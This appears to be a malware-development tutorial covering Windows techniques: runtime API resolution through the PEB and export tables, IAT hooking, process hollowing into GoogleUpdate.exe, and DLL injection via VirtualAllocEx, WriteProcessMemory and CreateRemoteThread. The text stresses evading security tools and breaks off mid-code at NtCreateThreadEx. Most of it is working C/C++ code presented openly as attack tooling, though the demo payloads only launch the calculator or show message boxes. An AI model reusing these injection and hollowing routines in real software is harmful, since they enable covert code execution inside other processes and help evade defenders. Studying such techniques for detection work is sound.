Today’s article is about understanding how code manipulation works in the context of malware development. We’ll cover things like loading functions dynamically, accessing the Process Environment Block (PEB), and executing functions in code.
Sure, XOR encryption is old-school, but it still works. AES? Even better. We’ll encrypt payloads, inject shellcode into live processes, and hijack DLLs. We’ll also dissect malware techniques, analyze low-level assembly tricks, and look at the tactics of APT33, APT28, and APT29.
And to take it up a notch, we’ll write a simple rootkit to:
- Hook syscalls
- Hide processes
Just raw, hands-on malware development. Let’s quickly cover some basics about how Windows programs interact with the operating system.
Windows API?
The Windows API (Application Programming Interface) is a collection of functions provided by Microsoft that allow programs to interact with the Windows operating system. These functions handle everything from windows and files to processes and memory, and for developers the WinAPI is like a Swiss Army knife: it’s essential.
When developing a program that calls a Windows API function like MessageBoxA, you’ve got two main ways to include that function:
- Static (load-time) linking: The call is bound at build time through an import library, so the function’s name is recorded in the program’s import table and the loader resolves it when the program starts. This guarantees the function is always available, but it also makes the import easy for security tools to spot.
- Dynamic (run-time) linking: The function’s code still lives in a separate DLL, but the program loads the DLL and looks up the function itself at runtime, keeping the import table leaner and the program more flexible.
Now, if we take a look at the simple example below, we’re using static linking to call MessageBoxA. While this approach works fine for basic programs, it’s not ideal for malware. Why? Because a statically declared import is a dead giveaway to security tools: anything that reads the import table can see which functions the program uses.
#include <windows.h>

int main(void) {
    MessageBoxA(0, "Foo Here.", "Info", 0);
    return 0;
}
Here, we’ve got a simple program that calls MessageBoxA, a Windows API function that displays a dialog box with custom text and a caption. Since we’re linking statically here, the reference to MessageBoxA is recorded directly in the program’s import table. It works fine, but as we said, this is a bit too obvious when it comes to malware.
So how can we do it dynamically?
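#include <windows.h>

// Function pointer type matching MessageBoxA's signature.
typedef int (WINAPI *def_MessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);

int main(void) {
    // Resolve the address at runtime instead of through the import table.
    size_t get_MessageBoxA = (size_t)GetProcAddress(LoadLibraryA("USER32.dll"), "MessageBoxA");
    def_MessageBoxA msgbox_a = (def_MessageBoxA)get_MessageBoxA;
    msgbox_a(0, "Foo Here.", "Info", 0);
    return 0;
}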
In this version, we’re dynamically loading MessageBoxA from USER32.dll at runtime using LoadLibraryA and GetProcAddress, which means that the address is resolved only when the program runs.
We define a function pointer type, def_MessageBoxA, that matches MessageBoxA’s signature. Then, we cast the address we get from GetProcAddress to our function pointer and use it to call the function.
Function Hooking in DLLs
Imagine you’ve got a DLL with two exported functions: func01 and func02. At first, both just display message boxes.
__declspec(dllexport) void func01() { MessageBoxA(0, "", "Function 1", 0); }
__declspec(dllexport) void func02() { MessageBoxA(0, "", "Function 2", 0); }
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Hook function func01
}
return TRUE;
}
The DllMain function automatically runs when the DLL is loaded. Initially, both functions just show message boxes. But by using dynamic function loading and hooking techniques, we can intercept and modify the behavior of func01 at runtime.
This is kiddy stuff so far. As we continue, we’ll dig deeper into techniques like PEB access and function hooking, and how they all come together to give us full control over execution.
Before continuing, I would like to highlight at which step the PEB is created during process creation. When a program is started (calc.exe, for example), the launching process calls a Win32 API function, CreateProcess, which asks the OS to create the process and start its execution.
Creating the process data structures: Windows creates the EPROCESS structure in kernel land for the newly created calc.exe process.
Initializing the virtual memory: Windows then creates the process’s virtual memory and its representation of physical memory and saves it inside the EPROCESS structure. It creates the PEB structure with all the necessary information, and then loads the two main DLLs that Windows applications will always need, ntdll.dll and kernel32.dll.
Finally, Windows loads the PE file and starts the execution.
- The PEB can be accessed from user mode and contains process-specific information.
- EPROCESS can only be accessed from kernel mode.
PEB Structure
The PEB is a data structure in the Windows operating system that contains information and settings related to a running process. The process control block, by contrast, contains data that is only useful to the kernel, such as the preferred CPU for this process. The Thread Control Block is entirely different again: it is what the kernel uses to manage threads, which are what the kernel runs at the lowest level.
Here, the PEB is accessed to retrieve information about loaded modules, specifically the base addresses of dynamically linked libraries (DLLs).
typedef struct _PEB_LDR_DATA {
ULONG Length;
UCHAR Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID EntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
typedef struct _UNICODE_STRING32 {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING32, *PUNICODE_STRING32;
typedef struct _PEB32 {
// ...
} PEB32, *PPEB32;
typedef struct _PEB_LDR_DATA32 {
// ...
} PEB_LDR_DATA32, *PPEB_LDR_DATA32;
typedef struct _LDR_DATA_TABLE_ENTRY32 {
// ...
} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;
As you can see, the PEB is a robust structure. The code defines several structures, such as PEB32, PEB_LDR_DATA32, and LDR_DATA_TABLE_ENTRY32, which are simplified versions of the actual PEB data structures. These structures contain fields that hold information about loaded modules and their locations in memory.
size_t GetModHandle(wchar_t *libName) {
PEB32 *pPEB = (PEB32 *)__readfsdword(0x30); // ds: fs[0x30]
PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);
for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {
LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(
curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks
);
printf("current node: %ls\n", data->BaseDllName.Buffer);
if (StrStrIW(libName, data->BaseDllName.Buffer))
return data->DllBase;
}
return 0;
}
The GetModHandle function accesses the PEB to find the base address of a loaded module. The PEB contains a data structure called PEB_LDR_DATA that manages information about loaded modules. The InMemoryOrderModuleList field of this structure is a linked list of loaded modules. The GetModHandle function iterates through this list and compares module names to find the desired module based on the libName parameter.
The PEB can be found at:
- fs:[0x30] for x86 processes
- gs:[0x60] for x64 processes
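The list walk in GetModHandle leans on one idea: each module record embeds a list node, and a CONTAINING_RECORD-style macro steps back from the node to the record that owns it. The sketch below shows that idea on made-up data in portable C, so it can be compiled anywhere. The names list_entry, module_entry, OWNER_OF, list_append, and find_module_base are hypothetical stand-ins for illustration, not Windows definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Simplified stand-in for LIST_ENTRY: a node in a circular doubly linked list. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Hypothetical, trimmed-down module record (the real entry has many more fields). */
typedef struct module_entry {
    const char *name;
    size_t base;
    list_entry links; /* embedded node, playing the role of InMemoryOrderLinks */
} module_entry;

/* Same idea as CONTAINING_RECORD: step back from the embedded node to its owner. */
#define OWNER_OF(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Append a record's embedded node at the tail of the list anchored at head. */
static void list_append(list_entry *head, list_entry *node) {
    node->flink = head;
    node->blink = head->blink;
    head->blink->flink = node;
    head->blink = node;
}

/* Walk the list and return the base stored for name, or 0 if it is absent. */
static size_t find_module_base(list_entry *head, const char *name) {
    assert(head != NULL && name != NULL);
    for (list_entry *cur = head->flink; cur != head; cur = cur->flink) {
        module_entry *m = OWNER_OF(cur, module_entry, links);
        if (strcmp(m->name, name) == 0)
            return m->base;
    }
    return 0;
}
```

To try it, initialize a head whose flink and blink both point at itself, append the links member of a few module_entry values, and call find_module_base with one of the names. The loop stops when it arrives back at the head, which is the same termination condition GetModHandle uses.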
Next we call the GetFuncAddr function, which will be used to locate the address of a specific function within a loaded module. It takes the moduleBase parameter, which is the base address of the module, and it looks into the export table of the module to find the address of the function with the specified name (szFuncName).
size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {
// parse export table
PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);
PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);
IMAGE_OPTIONAL_HEADER optHdr = ntHdr->OptionalHeader;
IMAGE_DATA_DIRECTORY dataDir_exportDir = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
// parse exported function info
PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);
DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);
DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);
WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);
The export table, part of the trusty PE (Portable Executable) file format, is like a map that tells us where the exported functions are hiding. The code above:
- Grabs the DOS header and NT header: these headers are like the gatekeepers, helping us navigate to the Optional Header of the PE file.
- Finds the exports: using the IMAGE_DIRECTORY_ENTRY_EXPORT index from the Optional Header’s data directory array, we pinpoint where the exports live.
- Calculates the export table address: now that we know where the exports are, we calculate the address of the table itself. This table holds all the goodies about the module’s exported functions.
// lookup
for (size_t i = 0; i < exportTable->NumberOfNames; i++) {
char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);
WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;
if (!stricmp(sz_CurrApiName, szFuncName)) {
printf("[+] Found ordinal %.4x - %s\n", num_CurrApiOrdinal, sz_CurrApiName); //enumeration process
return moduleBase + arrFuncs[ num_CurrApiOrdinal - 1 ];
}
}
return 0;
}
The loop then calculates the function’s address by referencing the arrFuncs array and the ordinal. The ordinal, when converted back to an index, retrieves the correct address from the array.
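The detail that is easy to miss in this lookup is that the position of a name in the name array is not the position of its address in the function array: the name-ordinal array sits in between. Here is a minimal, portable sketch of that three-array relationship on synthetic data. The export_view struct and lookup_export_rva function are hypothetical names made up for this illustration, and the values are relative offsets, not real addresses.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical in-memory model of an export directory's three arrays. */
typedef struct export_view {
    const char *const *names;  /* like AddressOfNames */
    const uint16_t *name_ords; /* like AddressOfNameOrdinals, parallel to names */
    const uint32_t *funcs;     /* like AddressOfFunctions */
    size_t name_count;         /* like NumberOfNames */
    size_t func_count;         /* like NumberOfFunctions */
} export_view;

/* Return the offset recorded for name, or 0 if the name is not exported. */
static uint32_t lookup_export_rva(const export_view *ev, const char *name) {
    assert(ev != NULL && name != NULL);
    for (size_t i = 0; i < ev->name_count; i++) {
        if (strcmp(ev->names[i], name) != 0)
            continue;
        uint16_t idx = ev->name_ords[i]; /* index into funcs, not the name index i */
        if (idx >= ev->func_count)
            return 0;                    /* malformed table: index out of range */
        return ev->funcs[idx];
    }
    return 0;
}
```

With names { "Alpha", "Beta", "Gamma" }, name ordinals { 2, 0, 1 }, and function offsets { 0x1100, 0x1200, 0x1300 }, looking up "Alpha" returns 0x1300 because its ordinal entry is 2. GetFuncAddr does the same thing when it adds 1 to the entry for printing and subtracts 1 again before indexing arrFuncs.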
Why is this important? This is usually how functions are resolved dynamically when code injection is performed. Now let’s take a look at the main function.
int main(int argc, char** argv, char** envp) {
    size_t kernelBase = GetModHandle(L"kernel32.dll");
    printf("[+] GetModHandle(kernel32.dll) = %p\n", (void *)kernelBase); // result of GetModHandle
    size_t ptr_WinExec = (size_t)GetFuncAddr(kernelBase, "WinExec");
    printf("[+] GetFuncAddr(kernel32.dll, WinExec) = %p\n", (void *)ptr_WinExec); // the address of WinExec
    ((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);
    return 0;
}
We call the GetModHandle function to find the base address of the “kernel32.dll” module in the current process. It uses the PEB to traverse the list of loaded modules and search for the one with the specified name (“kernel32.dll”). Next we call GetFuncAddr to locate the address of WinExec, passing the base address of “kernel32.dll” obtained in the previous step and the function name “WinExec” as arguments. Finally, the code dynamically invokes the WinExec function using the address obtained earlier. It casts ptr_WinExec to the appropriate function pointer type and calls it with the arguments “calc” (to run the Windows Calculator) and SW_SHOW.
This demonstrates how to dynamically locate and execute the WinExec function from the “kernel32.dll” module, effectively opening the Calculator. It shows how code manipulation can be achieved by accessing the PEB and locating and using specific functions from loaded modules.
((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);
- (UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec typecasts the ptr_WinExec pointer into a function pointer with the appropriate signature. This typecasting is crucial to match the required parameters of the WinExec function, which include a string (LPCSTR) and an integer (UINT).
- ("calc", SW_SHOW) represents the arguments passed to the WinExec function. In this piece, it instructs the system to open the Windows Calculator (“calc”) with a specified display mode (SW_SHOW).
The code resolves and calls WinExec entirely at runtime, from within the current process. Rather than statically linking to the WinExec function, this code locates and invokes it dynamically.
IAT Hooking
Sometimes we want to intercept function calls at runtime. One way to achieve this is through “Import Address Table (IAT) Hooking.” The IAT contains the addresses of functions that a module (such as a DLL or executable) imports from other modules. IAT hooking allows us to intercept and modify function calls by manipulating the IAT.
Application mydll
+-------------------+ +--------------------+
| | | MessageBoxA |
| | +------------>---------------------+
| call MessageBoxA | IAT | | .... |
| | +-------------------+ |(user32!MsgBoxA) |
+-------------------+ | | | | .... |
+----------> jmp + | +--------------------+
| | | |
+-------------------+ +--------------------+
First, the target program calls the WinAPI MessageBoxA function. Second, the program looks up the MessageBoxA address in the IAT. Third, code execution jumps to the user32!MessageBoxA address resolved in step 2, where the legitimate code for displaying the message box lives.
#define getNtHdr(buf) ((IMAGE_NT_HEADERS *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew))
#define getSectionArr(buf) ((IMAGE_SECTION_HEADER *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew + sizeof(IMAGE_NT_HEADERS)))
The application code makes a function call to MessageBoxA. When the code makes a function call, it does not directly call that function. Instead, it looks up the address of the function in the IAT, which contains entries for various imported functions. Once the address of MessageBoxA is resolved in the IAT, the code execution jumps to that resolved address. In this piece, the resolved address points to the legitimate user32!MessageBoxA function.
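Stripped of the PE details, the indirection described here is just a call through a table of function pointers. The sketch below models it in portable C with a one-slot table, to show why swapping a slot redirects every caller at once. Everything in it (real_add, import_table, call_add, hooked_add, install_hook) is a hypothetical stand-in invented for this illustration and has nothing to do with the real loader structures.

```c
#include <assert.h>
#include <stddef.h>

typedef int (*binary_fn)(int, int);

/* Hypothetical "imported" function standing in for an API in another module. */
static int real_add(int a, int b) { return a + b; }

/* One-slot table playing the role of the IAT. */
static binary_fn import_table[1] = { real_add };

/* Every call site goes through the table, like an indirect call via the IAT. */
static int call_add(int a, int b) { return import_table[0](a, b); }

/* Saved original pointer so the replacement can still forward to it. */
static binary_fn original_add = NULL;
static int hook_calls = 0;

/* Replacement that counts calls and then forwards to the original. */
static int hooked_add(int a, int b) {
    hook_calls++;
    return original_add(a, b);
}

/* Swap the table slot and remember what was there before. */
static void install_hook(void) {
    assert(import_table[0] != hooked_add); /* avoid installing twice */
    original_add = import_table[0];
    import_table[0] = hooked_add;
}
```

Before install_hook runs, call_add(2, 3) goes straight to real_add. Afterwards the same call site still returns 5, but it passes through hooked_add first and hook_calls goes up by one. Saving the original pointer before overwriting the slot is what lets the replacement forward the call instead of losing it.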
size_t ptr_msgboxa = 0;
void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr)
{
auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
for (; impModuleList->Name; impModuleList++)
{
auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
for (int i = 0; arr_apiNames[i].u1.Function; i++)
{
auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name))
{
apiAddr = arr_callVia[i].u1.Function;
arr_callVia[i].u1.Function = callback;
break;
}
}
}
}
int main(int argc, char **argv)
{
void (*ptr)(UINT, LPCSTR, LPCSTR, UINT) = [](UINT hwnd, LPCSTR lpText, LPCSTR lpTitle, UINT uType) {
printf("[hook] MessageBoxA(%i, \"%s\", \"%s\", %i)", hwnd, lpText, lpTitle, uType);
((UINT(*)(UINT, LPCSTR, LPCSTR, UINT))ptr_msgboxa)(hwnd, "msgbox got hooked", "alert", uType);
};
iatHook((char *)GetModuleHandle(NULL), "MessageBoxA", (size_t)ptr, ptr_msgboxa);
MessageBoxA(0, "Hook Test", "title", 0);
return 0;
}
So what’s going on here? Instead of executing the legitimate user32!MessageBoxA function, the IAT entry for MessageBoxA is modified to point to a replacement function (the ptr function in the code). As a result, when the application makes a call to MessageBoxA, it actually calls the replacement function, which can alter or extend the behavior of the original function call.
Process Hollowing
Process hollowing is a technique that begins with the creation of a new instance of a legitimate process in a suspended state. Because the process is suspended before it runs any of its own code, its memory can be replaced, and the injected code then executes within the context of this process.
To successfully perform process hollowing, the source image (the executable being injected into the legitimate process) must meet specific requirements and characteristics to ensure that the technique works effectively. These requirements include:
- PE Format: The source image must be in the Portable Executable (PE) format, which is the standard executable file format on Windows. This format includes headers and sections that define the structure of the executable.
- Executable Code: The source image should contain executable code that can be run by the Windows operating system. This code is typically located within the .text section of the PE file.
- Address of Entry Point: The PE header of the source image must specify the address of the entry point, which is the starting point for the execution of the code. The address of the entry point is used to set the EAX register in the context of the suspended process.
- Sections and Data: The source image should contain necessary sections, such as the .text section for code and other sections for data. These sections should be properly defined in the PE header, and the data should be accessible and relevant to the code’s execution.
- Relocation Table: The source image may have a relocation table that allows it to be loaded at a different base address. If the source image lacks a relocation table, it may only work if it can be loaded at its preferred base address.
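The first requirement, that the source image is a PE file, is also the easiest one to check from a raw buffer. As a minimal sketch, the portable C below tests for the "MZ" DOS signature and follows the e_lfanew field at offset 0x3C to the "PE\0\0" signature. The helper names read_u32le and looks_like_pe are made up for this example, and it checks the signatures only: it does not validate sections, the entry point, or relocations.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Read a little-endian 32-bit value without assuming alignment. */
static uint32_t read_u32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Return 1 if buf starts with an "MZ" DOS header whose e_lfanew field
 * (offset 0x3C) points at a "PE\0\0" signature inside the buffer, else 0.
 */
static int looks_like_pe(const uint8_t *buf, size_t len) {
    assert(buf != NULL);
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return 0;
    uint32_t e_lfanew = read_u32le(buf + 0x3C);
    if (e_lfanew > len || len - e_lfanew < 4)
        return 0; /* signature would fall outside the buffer */
    return memcmp(buf + e_lfanew, "PE\0\0", 4) == 0;
}
```

The bounds check before the memcmp matters: e_lfanew comes from the file itself, so a truncated or malformed file could otherwise send the read past the end of the buffer.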
Creating the Process
The target process must be created in the suspended state. The code aims to create a new instance of a process in a suspended state and subsequently replace its code and data with the code and data from another executable (the source image), which includes creating a suspended process and performing memory operations to load the new image.
// Create a new instance of current process in suspended state, for the new image.
if (CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI))
{
// Allocate memory for the context.
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
// Retrieve the context.
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
{
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
// File Mapping
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
WriteProcessMemory
(
PI.hProcess,
LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
LPVOID((size_t)Image + SectionHeader[i].PointerToRawData),
SectionHeader[i].SizeOfRawData,
0
);
}
}
The CreateProcessA function is used to create a new instance of the current process (or another specified executable). The CREATE_SUSPENDED flag creates the process in a suspended state, meaning its execution is paused. After creating the suspended process, memory is allocated using VirtualAlloc to hold the context of the suspended process’s main thread. The context structure (CTX) is used to capture information about the thread’s execution state.
Retrieving and Updating Context
- The GetThreadContext function is called to retrieve the context of the suspended process’s main thread (PI.hThread). The context is stored in the CTX structure.
- The context is updated to prepare for the execution of the new code. Specifically, the EAX register is set to the address of the entry point of the new code.
- The code then copies the headers (PE header) of the source image into the allocated memory within the suspended process using WriteProcessMemory. This is crucial for ensuring that the new image is loaded correctly.
- A loop iterates through the sections of the source image (SectionHeader) and copies the section data from the source image to the corresponding memory locations within the suspended process using WriteProcessMemory. This step is essential to load the code and data.
At this point, the hollowing is set up, and the new image’s code and data have been loaded into the memory of the suspended process. The code execution will continue from this point, allowing the new image to execute within the context of the suspended process.
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&pImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
The destination address is calculated as CTX->Ebx + 8, and 4 bytes of data are written. In a freshly created, suspended 32-bit process, EBX points to the PEB, and offset 8 is its ImageBaseAddress field, so this write tells the process where the new image has been loaded.
CTX->Eax is updated with the address of the new code’s entry point. For a suspended 32-bit process, EAX holds the address where the initial thread will begin executing, so this redirects the thread to the loaded code once SetThreadContext applies the change. The entry point address is obtained from the PE header of the source image: NtHeader->OptionalHeader.AddressOfEntryPoint. Finally, the ResumeThread function is called to resume the execution of the suspended process. At this point, the process begins executing the injected code, starting from the entry point that was set. The injected code within the suspended process will now take control of the process’s execution.
char CurrentFilePath[MAX_PATH + 1];
GetModuleFileNameA(0, CurrentFilePath, MAX_PATH);
if (strstr(CurrentFilePath, "GoogleUpdate.exe")) {
    MessageBoxA(0, "foo", "", 0);
    return 0;
}
LONGLONG len = -1;
RunPortableExecutable("GoogleUpdate.exe", MapFileToMemory(CurrentFilePath, len));
return 0;
}
Once the application is run, GetModuleFileNameA is used to retrieve the full path of the currently running executable (the application itself). A conditional check using strstr then examines CurrentFilePath. If the file path contains “GoogleUpdate.exe”, the code is already running inside the hollowed process, so it displays a message box with an empty title and the message “foo” using the MessageBoxA function and returns. Otherwise, it proceeds with the process hollowing technique: it calls the RunPortableExecutable function with “GoogleUpdate.exe” as the target process and passes its own file, mapped into memory, as the source image. This is a simple example.
What we just explained is similar to what’s implemented in X-Agent (also known as Sofacy), a malware known to be associated with APT28 (Fancy Bear). APT stands for “Advanced Persistent Threat,” alright?
Now, the trick is in replacing the code of a trusted process. The malware starts by creating a new instance of the target process in a suspended state. This is done using the CreateProcess API with the CREATE_SUSPENDED flag.
DLL injection Techniques
DLL injection is the act of introducing code into a currently executing process. Typically, the code we introduce takes the form of a dynamic link library (DLL) since DLLs are designed to be loaded as needed during runtime. However, this doesn’t preclude us from injecting assembly code or other forms of code (such as executables or handwritten code). It’s crucial to bear in mind that you must possess the necessary level of privileges on the system to engage in memory manipulation within other programs.
The Windows API provides a range of functions that enable us to attach to and manipulate other programs, primarily for debugging purposes. We will make use of these methods to execute DLL injection. I’ve divided the DLL injection process into four distinct steps:
- Attach to the process
- Allocate Memory within the process
- Copy the DLL or the DLL Path into the process’s memory and determine appropriate memory addresses
- Instruct the process to Execute your DLL
Each one of these steps can be accomplished through the use of one or more programming techniques, which are summarized in the list below. It’s important to understand the details and options present for each technique, as they all have their positives and negatives.
- LoadLibrary: Using the LoadLibrary function to load a DLL into a process.
- CreateRemoteThread: Injecting a DLL using the CreateRemoteThread function.
- SetWindowsHookEx: Using Windows hooks to inject code into other processes.
- Process Hollowing: Replacing the code and data of a legitimate process with a malicious DLL.
We have a couple of options (e.g. CreateRemoteThread(), NtCreateThreadEx(), etc.) when instructing the target process to launch our DLL. Unfortunately we can’t just provide the name of our DLL to these functions; instead we have to provide a memory address to start execution at. We perform the Allocate and Copy steps to obtain space within the target process’s memory and prepare it as an execution starting point.
There are two popular starting points: LoadLibraryA() and jumping to DllMain.
LoadLibraryA()
LoadLibraryA() is a kernel32.dll function used to load DLLs, executables, and other supporting libraries at run time. It takes a filename as its only parameter and magically makes everything work. This means that we just need to allocate some memory for the path to our DLL and set our execution starting point to the address of LoadLibraryA(), providing the memory address where the path lies as a parameter.
The major downside to LoadLibraryA() is that it registers the loaded DLL with the program and thus can be easily detected. Another slightly annoying caveat is that if a DLL has already been loaded once with LoadLibraryA(), it will not execute it again. You can work around this issue but it’s more code.
Jumping to DllMain (or another entry point)
An alternative method to LoadLibraryA() is to load the entire DLL into memory, then determine the offset to the DLL’s entry point. Using this method you can avoid registering the DLL with the program (stealthy) and repeatedly inject into a process.
Attaching to the Process
First we’ll need a handle to the process so that we can interact with it. This is done with the OpenProcess() function. We’ll also need to request certain access rights in order to perform the tasks below. The specific access rights we request vary across Windows versions; however, the following should work for most:
hHandle = OpenProcess( PROCESS_CREATE_THREAD |
PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE |
PROCESS_VM_READ,
FALSE,
procID );
Before we can inject anything into another process, we’ll need a place to put it. We’ll use the VirtualAllocEx() function to do so.
VirtualAllocEx() takes the amount of memory to allocate as one of its parameters. If we use LoadLibraryA(), we’ll allocate space for the full path of the DLL, and if we jump to DllMain, we’ll allocate space for the DLL’s full contents.
DLL Path
Allocating space for just the DLL path slightly reduces the amount of code you’ll need to write, but not by much. It also requires you to use the LoadLibraryA() method, which has some downsides (described above). That being said, it is a very popular method.
Use VirtualAllocEx() and allocate enough memory to support a string which contains the path to the DLL:
GetFullPathName(TEXT("foo.dll"),
BUFSIZE,
dllPath, //Output to save the full DLL path
NULL);
dllPathAddr = VirtualAllocEx(hHandle,
0,
strlen(dllPath),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
Full DLL
Allocating space for the full DLL requires a little more code; however, it’s also much more reliable and doesn’t need to use LoadLibraryA().
First, open a handle to the DLL with CreateFileA(), then calculate its size with GetFileSize() and pass it to VirtualAllocEx():
GetFullPathName(TEXT("foo.dll"),
BUFSIZE,
dllPath, //Output to save the full DLL path
NULL);
hFile = CreateFileA( dllPath,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL );
dllFileLength = GetFileSize( hFile,
NULL );
remoteDllAddr = VirtualAllocEx( hProcess,
NULL,
dllFileLength,
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE );
Now that we have space allocated in our target process, we can copy our DLL Path or the Full DLL (depending on the method you choose) into that process. We’ll use WriteProcessMemory() to do so:
DLL Path
WriteProcessMemory(hHandle,
dllPathAddr,
dllPath,
strlen(dllPath),
NULL);
Full DLL
We’ll first need to read our DLL into memory before we copy it to the remote process.
lpBuffer = HeapAlloc( GetProcessHeap(),
0,
dllFileLength);
ReadFile( hFile,
lpBuffer,
dllFileLength,
&dwBytesRead,
NULL );
WriteProcessMemory( hProcess,
lpRemoteLibraryBuffer,
lpBuffer,
dllFileLength,
NULL );
Determining our Execution Starting Point
Most execution functions take a memory address to start at, so we’ll need to determine what that will be.
DLL Path and LoadLibraryA()
We’ll search our own process memory for the starting address of LoadLibraryA(), then pass it to our execution function with the memory address of DLL Path as its parameter. To get LoadLibraryA()’s address, we’ll use GetModuleHandle() and GetProcAddress():
loadLibAddr = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA");
Full DLL and Jump to DllMain
By copying the entire DLL into memory we can avoid registering our DLL with the process and inject more reliably. The somewhat difficult part of doing this is obtaining the entry point to our DLL when it’s loaded in memory. So we’ll use the GetReflectiveLoaderOffset() function from the ReflectiveDLLInjection project to determine the offset in our own process’s memory, then use that offset plus the base address of the memory in the victim process we wrote our DLL to as the execution starting point. It’s important to note here that the DLL we’re injecting must be compiled with the appropriate includes and options so that it aligns itself with the ReflectiveDLLInjection method.
dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpWriteBuff);
Executing the DLL!
At this point we have our DLL in memory and we know the memory address we’d like to start execution at. All that’s really left is to tell our process to execute it. There are a couple of ways to do this.
CreateRemoteThread()
The CreateRemoteThread() function is probably the most widely known and used method. It’s very reliable and works most of the time; however, you may want to use another method to avoid detection, or in case Microsoft changes something that causes CreateRemoteThread() to stop working.
Since CreateRemoteThread() is a very established function, you have greater flexibility in how you use it. For instance, you can do things like use Python to do DLL injection!
rThread = CreateRemoteThread(hTargetProcHandle, NULL, 0, lpStartExecAddr, lpExecParam, 0, NULL);
WaitForSingleObject(rThread, INFINITE);
NtCreateThreadEx()
NtCreateThreadEx() is an undocumented ntdll.dll function. The trouble with undocumented functions is that they may disappear or change at any moment Microsoft decides. That being said, NtCreateThreadEx() came in handy when Windows session separation affected CreateRemoteThread() DLL injection.
NtCreateThreadEx() is a bit more complicated to call: we’ll need a specific structure to pass to it and another to receive data from it. I’ve detailed it here:
struct NtCreateThreadExBuffer {
ULONG Size;
ULONG Unknown1;
ULONG Unknown2;
PULONG Unknown3;
ULONG Unknown4;
ULONG Unknown5;
ULONG Unknown6;
PULONG Unknown7;
ULONG Unknown8;
};
typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) (
OUT PHANDLE hThread,
IN ACCESS_MASK DesiredAccess,
IN LPVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN LPTHREAD_START_ROUTINE lpStartAddress,
IN LPVOID lpParameter,
IN BOOL CreateSuspended,
IN ULONG StackZeroBits,
